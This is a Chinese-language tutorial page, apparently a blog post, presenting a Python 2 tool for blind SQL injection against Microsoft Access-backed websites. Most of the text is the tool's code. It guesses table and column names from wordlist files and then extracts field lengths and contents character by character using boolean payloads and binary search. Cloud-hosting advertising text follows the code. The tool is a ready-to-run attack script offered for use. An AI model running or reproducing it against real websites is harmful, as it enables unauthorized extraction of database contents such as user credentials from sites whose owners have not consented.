標籤:
Access注入模組編寫
#coding=gb2312import urllibimport string#定義Access注入函數class AccessInject(): def __init__(self,url): self.url=url self.tableNames=[] self.cloumnNames=[] self.length=0 #定義擷取表名的函數,使用檔案猜解的方式 #主要SQL語句:.and exists (select * from 資料庫表名) def getTableName(self): n=0 tablefile = open("table.txt") for line in tablefile.readlines(): line = string.strip(line) sql = string.join([‘%20and%20exists%20(select%20*%20from%20‘,line,‘)‘],‘‘) page=urllib.urlopen(self.url).read() pagex=urllib.urlopen(self.url+sql).read() if page==pagex: self.tableNames.append(line) else: continue if len(self.tableNames)==0: n=0 print ‘未猜解到表名.‘ return n else: n=len(self.tableNames) print ‘存在表:‘ for t in self.tableNames: print t return n print ‘‘ #定義擷取列名的函數 #主要SQL語句:and exists (select 欄位名 from 表名) def getColumnName(self,TN): column = open("columns.txt") for columnline in column.readlines(): columnline = string.strip(columnline) sql = string.join([‘%20and%20exists%20(select%20‘,columnline,‘%20from%20‘,TN,‘)‘],‘‘) page=urllib.urlopen(self.url).read() pagex=urllib.urlopen(self.url+sql).read() if page==pagex: self.cloumnNames.append(columnline) else: continue if len(self.cloumnNames)==0: print ‘未猜解出列名.‘ else: print ‘存在列:‘ for c in self.cloumnNames: print c #定義擷取欄位長度的函數 #主要使用二分法 #主要SQL語句:and (select top 1 len(欄位) from 表名)> n def getColumnLenth(self,TN,CN,f1=0,f2=36): page=urllib.urlopen(self.url).read() while f1<=f2: mid=(f1+f2)/2 u=self.url+‘%20and%20(select%20top%201%20len%20(‘ u+=CN u+=‘)%20from%20‘ u+=TN u+=‘)>‘ ux=u+str(mid) pagex=urllib.urlopen(ux).read() if page==pagex: uy=u+str(mid+1) pagey=urllib.urlopen(uy).read() if page!=pagey: self.length=mid+1 print CN,‘內容長度:‘,self.length return self.length break else: f1=mid+1 else: f2=mid #定義擷取欄位內容的函數 #主要使用二分法 #主要SQL語句:and (select top 1 asc(mid(欄位名,1,1)) from 表名)>0 def getContent(self,TN,CN,lenth): content=‘‘ page=urllib.urlopen(self.url).read() for n in range(1,lenth+1): f1=32 f2=128 while f1<=f2: mid=(f1+f2)/2 url=self.url+"%20and%20(select%20top%201%20asc%20(mid(" url+=CN url+=‘,‘ url+=str(n) url+=",1))%20from%20" url+=TN url+=")>" urlx=url+str(mid) pagex=urllib.urlopen(urlx).read() if page==pagex: urly=url+str(mid+1) pagey=urllib.urlopen(urly).read() if page!=pagey: content+=chr(mid+1) break else: f1=mid else: f2=mid print CN,‘內容:‘,content
Python編寫SQL注入工具(2)
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
